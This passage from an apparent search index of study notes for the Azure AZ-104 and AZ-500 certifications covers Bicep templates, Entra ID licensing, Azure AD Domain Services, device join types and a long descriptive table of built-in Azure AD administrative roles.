                            **To create a ARM template use Visual Studio Code with the extension \"Azure Resource Manager (ARM) Tools for Visual Studio Code\". **

                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#biceps-templates","title":"Biceps templates","text":"

                            Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources. In a Bicep file, you define the infrastructure you want to deploy to Azure, and then use that file throughout the development lifecycle to repeatedly deploy your infrastructure. Your resources are deployed in a consistent manner. Bicep provides concise syntax, reliable type safety, and support for code reuse. Bicep offers a first-class authoring experience for your\u00a0infrastructure-as-code\u00a0solutions in Azure.

                            How does Bicep work?

                            When you deploy a resource or series of resources to Azure, the tooling that's built into Bicep converts your Bicep template into a JSON template. This process is known as transpilation. Transpilation is the process of converting source code written in one language into another language.

                            Bicep provides many improvements over JSON for template authoring, including:

                            • Simpler syntax: Bicep provides a simpler syntax for writing templates. You can reference parameters and variables directly, without using complicated functions. String interpolation is used in place of concatenation to combine values for names and other items. You can reference the properties of a resource directly by using its symbolic name instead of complex reference statements. These syntax improvements help both with authoring and reading Bicep templates.

                            • Modules: You can break down complex template deployments into smaller module files and reference them in a main template. These modules provide easier management and greater reusability.

                            • Automatic dependency management: In most situations, Bicep automatically detects dependencies between your resources. This process removes some of the work involved in template authoring.

                            • Type validation and IntelliSense: The Bicep extension for Visual Studio Code features rich validation and IntelliSense for all Azure resource type API definitions. This feature helps provide an easier authoring experience.

                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/","title":"I. Manage Identity and Access","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            Azure Active Directory\u00a0(Azure AD) is a cloud-based identity and access management service.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#1-microsoft-entra-id","title":"1. Microsoft Entra ID","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#11-microsoft-entra-id-licenses","title":"1.1. Microsoft Entra ID licenses","text":"
                            • Azure Active Directory Free.\u00a0Provides user and group management, on-premises directory synchronization, basic reports, self-service password change for cloud users, and single sign-on across Azure, Microsoft 365, and many popular SaaS apps.
                            • Azure Active Directory Premium P1.\u00a0In addition to the Free features, P1 lets your hybrid users access both on-premises and cloud resources. It also supports advanced administration, such as dynamic groups, self-service group management, Microsoft Identity Manager, and cloud write-back capabilities, which allow self-service password reset for your on-premises users.
                            • Azure Active Directory Premium P2.\u00a0In addition to the Free and P1 features, P2 also offers Azure Active Directory Identity Protection to help provide risk-based Conditional Access to your apps and critical company data and Privileged Identity Management to help discover, restrict, and monitor administrators and their access to resources and to provide just-in-time access when needed.
                            • \"Pay as you go\"\u00a0feature licenses. You also get additional feature licenses, such as Azure Active Directory Business-to-Customer (B2C). B2C can help you provide identity and access management solutions for your customer-facing apps.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#12-azure-active-directory-domain-services-azure-ad-ds","title":"1.2. Azure Active Directory Domain Services (Azure AD DS)","text":"

                            There are\u00a0two ways\u00a0to provide Active Directory Domain Services in the cloud:

                            • A\u00a0managed domain\u00a0that you create using Azure Active Directory Domain Services (Azure AD DS). Microsoft creates and manages the required resources. Azure AD DS \u00a0deploys, manages, patches, and secures the active directory domain service infrastructure for you. It's a managed domain experience. Azure AD DS provides a smaller subset of features to traditional self-managed AD DS environment, which reduces some of the design and management complexity. For example, there are no AD forests, domains, sites, and replication links to design and maintain. Also it guarantees access to traditional authentication mechanisms such as Kerberos or NTLM.
                            • A\u00a0self-managed\u00a0domain that you create and configure using traditional resources such as virtual machines (VMs), Windows Server guest OS, and Active Directory Domain Services (AD DS). You then continue to administer these resources. You're then able to do additional tasks, such as extending the schema or create forest trust. Common deployment models in a self-managed domain are:
                              • Standalone cloud-only AD DS: Azure VMs are configured as domain controllers, and a separate, cloud-only AD DS environment is created. This AD DS environment doesn't integrate with an on-premises AD DS environment. A different set of credentials is used to sign in and administer VMs in the cloud.
                              • Resource forest deployment\u00a0- Azure VMs are configured as domain controllers, and an AD DS domain that's part of an existing forest is created. A trust relationship is then configured to an on-premises AD DS environment. Other Azure VMs can domain-join this resource forest in the cloud. User authentication runs over a VPN / ExpressRoute connection to the on-premises AD DS environment.
                              • Extend on-premises domain to Azure\u00a0- An Azure virtual network connects to an on-premises network using a VPN / ExpressRoute connection. Azure VMs connect to this Azure virtual network, which lets them domain-join to the on-premises AD DS environment. An alternative is to create Azure VMs and promote them as replica domain controllers from the on-premises AD DS domain. These domain controllers replicate over a VPN / ExpressRoute connection to the on-premises AD DS environment. The on-premises AD DS domain is effectively extended into Azure.

                            The following table outlines some of the features you may need for your organization and the differences between a managed Azure AD DS domain or a self-managed AD DS domain:

                            Feature Azure Active Directory Services (Azure AD DS) Self-managed AD DS Managed service \u2713 \u2715 Secure deployments \u2713 The administrator secures the deployment Domain Name System (DNS) server \u2713 (managed service) \u2713 Domain or Enterprise administrator privileges \u2715 \u2713 Domain join \u2713 \u2713 Domain authentication using New Technology LAN Manager (NTLM) and Kerberos \u2713 \u2713 Kerberos constrained delegation Resource-based Resource-based & account-based Custom organizational unit (OU) structure \u2713 \u2713 Group Policy \u2713 \u2713 Schema extensions \u2715 \u2713 Active Directory domain/forest trusts \u2713 (one-way outbound forest trusts only) \u2713 Secure Lightweight Directory Access Protocols (LDAPs) \u2713 \u2713 Lightweight Directory Access Protocol (LDAP) read \u2713 \u2713 Lightweight Directory Access Protocol (LDAP) write \u2713 (within the managed domain) \u2713 Geographical-distributed (Geo-distributed) deployments \u2713 \u2713

                            Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#13-signing-devices-to-azure-active-directory","title":"1.3. Signing devices to Azure Active Directory","text":"

                            Azure AD lets you manage the identity of devices used by the organization and control access to corporate resources from those devices. Users can also register their personal device (a bring-your-own (BYO) model) with Azure AD, which provides the device with an identity. Azure AD then authenticates the device when a user signs in to Azure AD and uses the device to access secured resources. The device can be managed using Mobile Device Management (MDM) software like Microsoft Intune. This management ability lets you restrict access to sensitive resources to managed and policy-compliant devices.

                            Azure AD joined devices give you the following benefits:

                            • Single sign-on (SSO) to applications secured by Azure AD.
                            • Enterprise policy-compliant roaming of user settings across devices.
                            • Access to the Windows Store for Business using corporate credentials.
                            • Windows Hello for Business.
                            • Restricted access to apps and resources from devices compliant with corporate policy.

                            The following table outlines common device ownership models and how they would typically be joined to a domain:

                            Type of device Device platforms Mechanism Personal devices Windows 10, iOS, Android, macOS Azure AD registered Organization-owned device not joined to on-premises AD DS Windows 10 Azure AD joined Organization-owned device joined to an on-premises AD DS Windows 10 Hybrid Azure AD joined

                            The following table outlines differences in how the devices are represented and can authenticate themselves against the directory:

                            Aspect Azure AD-joined Azure AD DS-joined Device controlled by Azure AD Azure AD Domain Services managed domain Representation in the directory Device objects in the Azure AD directory Computer objects in the Azure AD DS managed domain Authentication Open Authorization OAuth / OpenID Connect-based protocols. These protocols are designed to work over the internet, so are great for mobile scenarios where users access corporate resources from anywher Kerberos and NTLM protocols, so it can support legacy applications migrated to run on Azure VMs as part of a lift-and-shift strategy Management Mobile Device Management (MDM) software like Intune Group Policy Networking Works over the internet Must be connected to, or peered with, the virtual network where the managed domain is deployed Great for... End-user mobile or desktop devices Server VMs deployed in Azure

                            If on-premises AD DS and Azure AD are configured for federated authentication using Active Directory Federation Services (ADFS), then there's no (current/valid) password hash available in Azure DS. Azure AD user accounts created before fed auth was implemented might have an old password hash that doesn't match a hash of their on-premises password. Hence Azure AD DS won't validate the user's credentials.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#14-roles-in-azure-active-directory","title":"1.4. Roles in Azure Active Directory","text":"

                            Azure AD built-in roles differ in where they can be used, which fall into the following\u00a0three broad categories.

                            1. Azure AD-specific roles: These roles grant permissions to manage resources within Azure AD only. For example,\u00a0User Administrator,\u00a0Application Administrator, and\u00a0Groups Administrator\u00a0all grant permissions to manage resources that live in Azure AD.
                            2. Service-specific roles: For major Microsoft 365 services (non-Azure AD), we have built service-specific roles that grant permissions to manage all features within the service.
                            3. Cross-service roles: There are some roles that span services. We have two global roles - Global Administrator and Global Reader. All Microsoft 365 services honor these two roles. Also, there are some security-related roles like Security Administrator and Security Reader that grant access across multiple security services within Microsoft 365.\u00a0For example, using Security Administrator roles in Azure AD, you can manage Microsoft 365 Defender portal, Microsoft Defender Advanced Threat Protection, and Microsoft Defender for Cloud Apps.

                            The following table is offered as an aid to understanding these role categories. The categories are named arbitrarily and aren't intended to imply any other capabilities beyond the documented Azure AD role permissions.

                            Category Role Azure AD-specific roles Application Administrator Application Developer Authentication Administrator Business to consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator Business to consumer (B2C) Identity Experience Framework (IEF) Policy Administrator Cloud Application Administrator Cloud Device Administrator Conditional Access Administrator Device Administrators Directory Readers Directory Synchronization Accounts Directory Writers External ID User Flow Administrator External ID User Flow Attribute Administrator External Identity Provider Administrator Groups Administrator Guest Inviter Helpdesk Administrator Hybrid Identity Administrator License Administrator Partner Tier1 Support Partner Tier2 Support Password Administrator Privileged Authentication Administrator Privileged Role Administrator Reports Reader User Administrator Cross-service roles Global Administrator Compliance Administrator Compliance Data Administrator Global Reader Security Administrator Security Operator Security Reader Service Support Administrator Service-specific roles Azure DevOps Administrator Azure Information Protection Administrator Billing Administrator Customer relationship management (CRM) Service Administrator Customer Lockbox Access Approver Desktop Analytics Administrator Exchange Service Administrator Insights Administrator Insights Business Leader Intune Service Administrator Kaizala Administrator Lync Service Administrator Message Center Privacy Reader Message Center Reader Modern Commerce User Network Administrator Office Apps Administrator Power BI Service Administrator Power Platform Administrator Printer Administrator Printer Technician Search Administrator Search Editor SharePoint Service Administrator Teams Communications Administrator Teams Communications Support Engineer Teams Communications Support Specialist Teams Devices Administrator Teams Administrator

                            These are all of the Azure AD built-in roles:

                            Role Description Application Administrator Users in this role can create and manage all aspects of enterprise applications, application registrations, and application proxy settings. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph. Application Developer Can create application registrations when the\u00a0Users can register applications\u00a0setting is set to No. Attack Payload Author Users in this role can create attack payloads but not actually launch or schedule them. Attack payloads are then available to all administrators in the tenant, who can use them to create a simulation. Attack Simulation Administrator Users in this role can create and manage all aspects of attack simulation creation, launch/scheduling of a simulation, and the review of simulation results. Members of this role have this access for all simulations in the tenant. Attribute Assignment Administrator Users with this role can assign and remove custom security attribute keys and values for supported Azure AD objects such as users, service principals, and devices. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles. Attribute Assignment Reader Users with this role can read custom security attribute keys and values for supported Azure AD objects. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. You must be assigned one of the custom security attribute roles to work with custom security attributes. Attribute Definition Administrator Users with this role can define a valid set of custom security attributes that can be assigned to supported Azure AD objects. This role can also activate and deactivate custom security attributes. By default, Global Administrator and other administrator roles don't have permissions to read, define, or assign custom security attributes. To work with custom security attributes, you must be assigned one of the custom security attribute roles. Authentication Administrator Assign the Authentication Administrator role to users who need to do the following: -Set or reset any authentication method (including passwords) for nonadministrators and some roles. -Require users who are nonadministrators or assigned to some roles to re-register against existing nonpassword credentials (for example,\u00a0Multifactor authentication (MFA)\u00a0or\u00a0Fast ID Online (FIDO), and can also revoke remember MFA on the device, which prompts for MFA on the next sign-in. -Perform sensitive actions for some users. -Create and manage support tickets in Azure and the Microsoft 365 admin center. Users with this role can't do the following tasks: -Can't change the credentials or reset MFA for members and owners of a role-assignable group. -Can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens. The same functions can be accomplished using the Set-MsolUser commandlet Azure AD PowerShell module. Authentication Policy Administrator Assign the Authentication Policy Administrator role to users who need to do the following: -Configure the authentication methods policy, tenant-wide MFA settings, and password protection policy that determine which methods each user can register and use. -Manage Password Protection settings: smart lockout configurations and updating the custom banned passwords list. -Create and manage verifiable credentials. -Create and manage Azure support tickets. Users with this role can't do the following tasks: -Can't update sensitive properties. -Can't delete or restore users. -Can't manage MFA settings in the legacy MFA management portal or Hardware OATH tokens. Azure AD Joined Device Local Administrator This role is available for assignment only as another local administrator in Device settings. Users with this role become local machine administrators on all Windows 10 devices that are joined to Azure Active Directory. They don't have the ability to manage device objects in Azure Active Directory. Azure DevOps Administrator Users with this role can manage all enterprise Azure DevOps policies applicable to all Azure DevOps organizations backed by the Azure AD. Users in this role can manage these policies by navigating to any Azure DevOps organization that is backed by the company's Azure AD. Users in this role can claim ownership of orphaned Azure DevOps organizations. This role grants no other Azure DevOps-specific permissions (for example, Project Collection Administrators) inside any of the Azure DevOps organizations backed by the company's Azure AD organization. Azure Information Protection Administrator Users with this role have all permissions in the Azure Information Protection service. This role allows configuring labels for the Azure Information Protection policy, managing protection templates, and activating protection. This role doesn't grant any permissions in Identity Protection Center, Privileged Identity Management, Monitor Microsoft 365 Service Health, or Office 365 Security and compliance center. Business-to-Consumer (B2C) Identity Experience Framework (IEF) Keyset Administrator Users can create and manage policy keys and secrets for token encryption, token signatures, and claim encryption/decryption. By adding new keys to existing key containers, this limited administrator can roll over secrets as needed without impacting existing applications. This user can see the full content of these secrets and their expiration dates even after their creation. Business-to-Consumer (B2C) Identity Experience Framework (IEF) Policy Administrator Users in this role have the ability to create, read, update, and delete all custom policies in Azure AD B2C and therefore have full control over the Identity Experience Framework in the relevant Azure AD B2C organization. By editing policies, this user can establish direct federation with external identity providers, change the directory schema, change all user-facing content HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript), change the requirements to complete authentication, create new users, send user data to external systems including full migrations, and edit all user information including sensitive fields like passwords and phone numbers. Conversely, this role can't change the encryption keys or edit the secrets used for federation in the organization. Billing Administrator Makes purchases, manages subscriptions, manages support tickets, and monitors service health. Cloud App Security Administrator Users with this role have full permissions in Defender for Cloud Apps. They can add administrators, add Microsoft Defender for Cloud Apps policies and settings, upload logs, and perform governance actions. Cloud Application Administrator Users in this role have the same permissions as the Application Administrator role, excluding the ability to manage application proxy. This role grants the ability to create and manage all aspects of enterprise applications and application registrations. Users assigned to this role aren't added as owners when creating new application registrations or enterprise applications. This role also grants the ability to consent for delegated permissions and application permissions, except for application permissions for Microsoft Graph. Cloud Device Administrator Users in this role can enable, disable, and delete devices in Azure AD and read Windows 10 BitLocker keys (if present) in the Azure portal. The role doesn't grant permissions to manage any other properties on the device. Compliance Administrator Users with this role have permissions to manage compliance-related features in the Microsoft Purview compliance portal, Microsoft 365 admin center, Azure, and Office 365 Security and compliance center. Assignees can also manage all features within the Exchange admin center and create support tickets for Azure and Microsoft 365. Compliance Data Administrator Users with this role have permissions to track data in the Microsoft Purview compliance portal, Microsoft 365 admin center, and Azure. Users can also track compliance data within the Exchange admin center, Compliance Manager, and Teams and Skype for Business admin center and create support tickets for Azure and Microsoft 365. Conditional Access Administrator Users with this role have the ability to manage Azure Active Directory Conditional Access settings. Customer Lockbox Access Approver Manages Microsoft Purview Customer Lockbox requests in your organization. They receive email notifications for Customer Lockbox requests and can approve and deny requests from the Microsoft 365 admin center. They can also turn the Customer Lockbox feature on or off. Only Global Administrators can reset the passwords of people assigned to this role. Desktop Analytics Administrator Users in this role can manage the Desktop Analytics service, including viewing asset inventory, creating deployment plans, and viewing deployment and health status. Directory Readers Users in this role can read basic directory information. This role should be used for: -Granting a specific set of guest users read access instead of granting it to all guest users. -Granting a specific set of nonadmin users access to the Azure portal when \"Restrict access to Azure AD portal to admins only\" is set to \"Yes\". -Granting service principals access to the directory where Directory.Read.All isn't an option. Directory Synchronization Accounts Don't use. This role is automatically assigned to the Azure AD Connect service and isn't intended or supported for any other use. Directory Writers Users in this role can read and update basic information of users, groups, and service principals. Domain Name Administrator Users with this role can manage (read,\u00a0add,\u00a0verify,\u00a0update, and\u00a0delete) domain names. They can also read directory information about users, groups, and applications, as these objects possess domain dependencies. For on-premises environments, users with this role can configure domain names for federation so that associated users are always authenticated on-premises. These users can then sign into Azure AD-based services with their on-premises passwords via single sign-on. Federation settings need to be synced via Azure AD Connect so users also have permissions to manage Azure AD Connect. Dynamics 365 Administrator Users with this role have global permissions within Microsoft Dynamics 365 Online when the service is present, and the ability to manage support tickets and monitor service health. Edge Administrator Users in this role can create and manage the enterprise site list required for Internet Explorer mode on Microsoft Edge. This role grants permissions to create, edit, and publish the site list and additionally allows access to manage support tickets. Exchange Administrator Users with this role have global permissions within Microsoft Exchange Online, when the service is present. Also has the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health. Exchange Recipient Administrator Users with this role have read access to recipients and write access to the attributes of those recipients in Exchange Online. External ID User Flow Administrator Users with this role can create and manage user flows (also called \"built-in\" policies) in the Azure portal. These users can customize HTML/CSS/JavaScript content, change MFA requirements, select claims in the token, manage API connectors and their credentials, and configure session settings for all user flows in the Azure AD organization. On the other hand, this role doesn't include the ability to review user data or make changes to the attributes that are included in the organization schema. Changes to Identity Experience Framework policies (also known as custom policies) are also outside the scope of this role. External ID User Flow Attribute Administrator Users with this role add or delete custom attributes available to all user flows in the Azure AD organization. Users with this role can change or add new elements to the end-user schema and impact the behavior of all user flows, and indirectly result in changes to what data may be asked of end users and ultimately sent as claims to applications. This role can't edit user flows. External Identity Provider Administrator This administrator manages federation between Azure AD organizations and external identity providers. With this role, users can add new identity providers and configure all available settings (for example, authentication path, service ID, assigned key containers). This user can enable the Azure AD organization to trust authentications from external identity providers. The resulting impact on end-user experiences depends on the type of organization: -Azure AD organizations for employees and partners: The addition of a federation (for example, with Gmail) immediately impacts all guest invitations not yet redeemed. See Adding Google as an identity provider for B2B guest users. -Azure Active Directory B2C organizations: The addition of a federation (for example, with Facebook, or with another Azure AD organization) doesn't immediately impact end-user flows until the identity provider is added as an option in a user flow (also called a built-in policy). Global Administrator Users with this role have access to all administrative features in Azure Active Directory, and services that use Azure Active Directory identities like the Microsoft 365 Defender portal, the Microsoft Purview compliance portal, Exchange Online, SharePoint Online, and Skype for Business Online. Furthermore, Global Administrators can elevate their access to manage all Azure subscriptions and management groups. This allows Global Administrators to get full access to all Azure resources using the respective Azure AD Tenant. The person who signs up for the Azure AD organization becomes a Global Administrator. There can be more than one Global Administrator at your company. Global Administrators can reset the password for any user and all other administrators. Global Administrator As a best practice, Microsoft recommends that you assign the Global Administrator role to\u00a0fewer than five people\u00a0in your organization. Global Reader Users in this role can read settings and administrative information across Microsoft 365 services but can't take management actions. Global Reader is the read-only counterpart to Global Administrator. Assign Global Reader instead of Global Administrator for planning, audits, or investigations. Use Global Reader in combination with other limited admin roles like Exchange Administrator to make it easier to get work done without the assigning the Global Administrator role. Global Reader works with Microsoft 365 admin center, Exchange admin center, SharePoint admin center, Teams admin center, Security center, compliance center, Azure AD admin center, and Device Management admin center. Users with this role can't do the following tasks: -Can't access the Purchase Services area in the Microsoft 365 admin center. Groups Administrator Users in this role can create/manage groups and its settings like naming and expiration policies. It's important to understand that assigning a user to this role gives them the ability to manage all groups in the organization across various workloads like Teams, SharePoint, Yammer in addition to Outlook. Also the user is able to manage the various groups settings across various admin portals like Microsoft admin center, Azure portal, and workload specific ones like Teams and SharePoint admin centers. Guest Inviter Users in this role can manage Azure Active Directory B2B guest user invitations when the Members can invite user setting is set to\u00a0No. Helpdesk Administrator Users with this role can change passwords, invalidate refresh tokens, create and manage support requests with Microsoft for Azure and Microsoft 365 services, and monitor service health. Invalidating a refresh token forces the user to sign in again. Whether a Helpdesk Administrator can reset a user's password and invalidate refresh tokens depends on the role the user is assigned. Users with this role\u00a0can't\u00a0do the following: -Can't change the credentials or reset MFA for members and owners of a\u00a0role-assignable group. Hybrid Identity Administrator Users in this role can create, manage and deploy provisioning configuration setup from AD to Azure AD using Cloud Provisioning and manage Azure AD Connect, Pass-through Authentication (PTA), Password hash synchronization (PHS), Seamless single sign-on (Seamless SSO), and federation settings. Users can also troubleshoot and monitor logs using this role. Identity Governance Administrator Users with this role can manage Azure AD identity governance configuration, including access packages, access reviews, catalogs and policies, ensuring access is approved and reviewed and guest users who no longer need access are removed. Insights Administrator Users in this role can access the full set of administrative capabilities in the Microsoft Viva Insights app. This role has the ability to read directory information, monitor service health, file support tickets, and access the Insights Administrator settings aspects. Insights Analyst Assign the Insights Analyst role to users who need to do the following tasks: -Analyze data in the Microsoft Viva Insights app, but can't manage any configuration settings -Create, manage, and run queries -View basic settings and reports in the Microsoft 365 admin center -Create and manage service requests in the Microsoft 365 admin center Insights Business Leader Users in this role can access a set of dashboards and insights via the Microsoft Viva Insights app. This includes full access to all dashboards and presented insights and data exploration functionality. Users in this role don't have access to product configuration settings, which is the responsibility of the Insights Administrator role. Intune Administrator Users with this role have global permissions within Microsoft Intune Online, when the service is present. Additionally, this role contains the ability to manage users and devices to associate policy and create and manage groups. This role can create and manage all security groups. However, Intune Administrator doesn't have admin rights over Office groups. That means the admin can't update owners or memberships of all Office groups in the organization. However, you can manage the Office group that's created, which comes as a part of end-user privileges. So, any Office group (not security group) that you create should be counted against your quota of 250. Kaizala Administrator Users with this role have global permissions to manage settings within Microsoft Kaizala, when the service is present and the ability to manage support tickets and monitor service health. Additionally, the user can access reports related to adoption and usage of Kaizala by Organization members and business reports generated using the Kaizala actions. Knowledge Administrator Users in this role have full access to all knowledge, learning and intelligent features settings in the Microsoft 365 admin center. They have a general understanding of the suite of products, licensing details and have responsibility to control access. Knowledge Administrator can create and manage content, like topics, acronyms and learning resources. Additionally, these users can create content centers, monitor service health, and create service requests. Knowledge Manager Users in this role can create and manage content, like topics, acronyms and learning content. These users are primarily responsible for the quality and structure of knowledge. This user has full rights to topic management actions to confirm a topic, approve edits, or delete a topic. This role can also manage taxonomies as part of the term store management tool and create content centers. License Administrator Users in this role can add, remove, and update license assignments on users, groups (using group-based licensing), and manage the usage location on users. The role doesn't grant the ability to purchase or manage subscriptions, create or manage groups, or create or manage users beyond the usage location. This role has no access to view, create, or manage support tickets. Lifecycle Workflows Administrator Assign the Lifecycle Workflows Administrator role to users who need to do the following tasks: -Create and manage all aspects of workflows and tasks associated with Lifecycle Workflows in Azure AD -Check the execution of scheduled workflows -Launch on-demand workflow runs -Inspect workflow execution logs Message Center Privacy Reader Users in this role can monitor all notifications in the Message Center, including data privacy messages. Message Center Privacy Readers get email notifications including those related to data privacy and they can unsubscribe using Message Center Preferences. Only the Global Administrator and the Message Center Privacy Reader can read data privacy messages. Additionally, this role contains the ability to view groups, domains, and subscriptions. This role has no permission to view, create, or manage service requests. Message Center Reader Users in this role can monitor notifications and advisory health updates in Message center for their organization on configured services such as Exchange, Intune, and Microsoft Teams. Message Center Readers receive weekly email digests of posts, updates, and can share message center posts in Microsoft 365. In Azure AD, users assigned to this role will only have read-only access on Azure AD services such as users and groups. This role has no access to view, create, or manage support tickets. Microsoft Hardware Warranty Administrator Assign the Microsoft Hardware Warranty Administrator role to users who need to do the following tasks: -Create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens -Search and read opened or closed warranty claims -Search and read warranty claims by serial number -Create, read, update, and delete shipping addresses -Read shipping status for open warranty claims -Create and manage service requests in the Microsoft 365 admin center -Read Message center announcements in the Microsoft 365 admin center Microsoft Hardware Warranty Specialist Assign the Microsoft Hardware Warranty Specialist role to users who need to do the following tasks: -Create new warranty claims for Microsoft manufactured hardware, like Surface and HoloLens -Read warranty claims that they created -Read and update existing shipping addresses -Read shipping status for open warranty claims they created -Create and manage service requests in the Microsoft 365 admin center Modern Commerce User Don't use. This role is automatically assigned from Commerce, and isn't intended or supported for any other use. The Modern Commerce User role gives certain users permission to access Microsoft 365 admin center and see the left navigation entries for Home, Billing, and Support. The content available in these areas is controlled by commerce-specific roles assigned to users to manage products that they bought for themselves or your organization. This might include tasks like paying bills, or for access to billing accounts and billing profiles. Users with the Modern Commerce User role typically have administrative permissions in other Microsoft purchasing systems, but don't have Global Administrator or Billing Administrator roles used to access the admin center. Network Administrator Users in this role can review network perimeter architecture recommendations from Microsoft that are based on network telemetry from their user locations. Network performance for Microsoft 365 relies on careful enterprise customer network perimeter architecture, which is generally user location specific. This role allows for editing of discovered user locations and configuration of network parameters for those locations to facilitate improved telemetry measurements and design recommendations Office Apps Administrator Users in this role can manage Microsoft 365 apps' cloud settings. This includes managing cloud policies, self-service download management and the ability to view Office apps related report. This role additionally grants the ability to manage support tickets, and monitor service health within the main admin center. Users assigned to this role can also manage communication of new features in Office apps. Organizational Messages Writer Assign the Organizational Messages Writer role to users who need to do the following tasks: -Write,\u00a0publish, and\u00a0delete\u00a0organizational messages using Microsoft 365 admin center or Microsoft Endpoint Manager -Manage\u00a0organizational message delivery options using Microsoft 365 admin center or Microsoft Endpoint Manager -Read\u00a0organizational message delivery results using Microsoft 365 admin center or Microsoft Endpoint Manager -View\u00a0usage reports and most settings in the Microsoft 365 admin center, but can't make changes Partner Tier1 Support Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners, and isn't intended for general use. Partner Tier2 Support Don't use. This role has been deprecated and will be removed from Azure AD in the future. This role is intended for use by a few Microsoft resale partners, and isn't intended for general use. Password Administrator Users with this role have limited ability to manage passwords. This role doesn't grant the ability to manage service requests or monitor service health. Whether a Password Administrator can reset a user's password depends on the role the user is assigned.Users with this role\u00a0can't\u00a0do the following tasks: -Can't change the credentials or reset MFA for members and owners of a role-assignable group. Permissions Management Administrator Assign the Permissions Management Administrator role to users who need to do the following tasks: -Manage\u00a0all aspects of Entra Permissions Management, when the service is present Power Business Intelligence (BI) Administrator Users with this role have global permissions within Microsoft Power BI, when the service is present and the ability to manage support tickets and monitor service health. Power Platform Administrator Users in this role can create and manage all aspects of environments, Power Apps, Flows, Data Loss Prevention policies. Additionally, users with this role have the ability to manage support tickets and monitor service health. Printer Administrator Users in this role can register printers and manage all aspects of all printer configurations in the Microsoft Universal Print solution, including the Universal Print Connector settings. They can consent to all delegated print permission requests. Printer Administrators also have access to print reports. Printer Technician Users with this role can register printers and manage printer status in the Microsoft Universal Print solution. They can also read all connector information. Key task a Printer Technician can't do is set user permissions on printers and sharing printers. Privileged Authentication Administrator Assign the Privileged Authentication Administrator role to users who need to do the following tasks: -Set\u00a0or\u00a0reset\u00a0any authentication method (including passwords) for any user, including Global Administrators. -Delete\u00a0or\u00a0restore\u00a0any users, including Global Administrators. For more information, see Who can perform sensitive actions. -Force users to re-register against existing nonpassword credential (such as MFA or FIDO) and revoke remember MFA on the device, prompting for MFA on the next sign-in of all users. -Update\u00a0sensitive properties for all users. For more information, see Who can perform sensitive actions. -Create\u00a0and\u00a0manage\u00a0support tickets in Azure and the Microsoft 365 admin center. Users with this role can't do the following tasks: -Can't manage per-user MFA in the legacy MFA management portal. The same functions can be accomplished using the Set-MsolUser commandlet Azure AD PowerShell module. Privileged Role Administrator Users with this role can manage role assignments in Azure Active Directory and within Azure AD Privileged Identity Management. They can create and manage groups that can be assigned to Azure AD roles. In addition, this role allows management of all aspects of Privileged Identity Management and administrative units. Privileged Role Administrator This role grants the ability to manage assignments for all Azure AD roles including the Global Administrator role. This role doesn't include any other privileged abilities in Azure AD like creating or updating users. However, users assigned to this role can grant themselves or others another privilege by assigning extra roles. Reports Reader Users with this role can view usage reporting data and the reports dashboard in Microsoft 365 admin center and the adoption context pack in Power Business Intelligence (Power BI). Additionally, the role provides access to all sign-in logs, audit logs, and activity reports in Azure AD and data returned by the Microsoft Graph reporting API. A user assigned to the Reports Reader role can access only relevant usage and adoption metrics. They don't have any admin permissions to configure settings or access the product-specific admin centers like Exchange. This role has no access to view, create, or manage support tickets. Search Administrator Users in this role have full access to all Microsoft Search management features in the Microsoft 365 admin center. Additionally, these users can view the message center, monitor service health, and create service requests. Search Editor Users in this role can create, manage, and delete content for Microsoft Search in the Microsoft 365 admin center, including bookmarks, questions and answers, and locations. Security Administrator Users with this role have permissions to manage security-related features in the Microsoft 365 Defender portal, Azure Active Directory Identity Protection, Azure Active Directory Authentication, Azure Information Protection, and Office 365 Security and compliance center. Security Operator Users with this role can manage alerts and have global read-only access on security-related features, including all information in Microsoft 365 security center, Azure Active Directory, Identity Protection, Privileged Identity Management and Office 365 Security & compliance center. Security Reader Users with this role have global read-only access on security-related feature, including all information in Microsoft 365 security center, Azure Active Directory, Identity Protection, Privileged Identity Management, and the ability to read Azure Active Directory sign-in reports and audit logs, and in Office 365 Security and compliance center. Service Support Administrator Users with this role can create and manage support requests with Microsoft for Azure and Microsoft 365 services, and view the service dashboard and message center in the Azure portal and Microsoft 365 admin center. SharePoint Administrator Users with this role have global permissions within Microsoft SharePoint Online, when the service is present, and the ability to create and manage all Microsoft 365 groups, manage support tickets, and monitor service health. Skype for Business Administrator Users with this role have global permissions within Microsoft Skype for Business, when the service is present, and manage Skype-specific user attributes in Azure Active 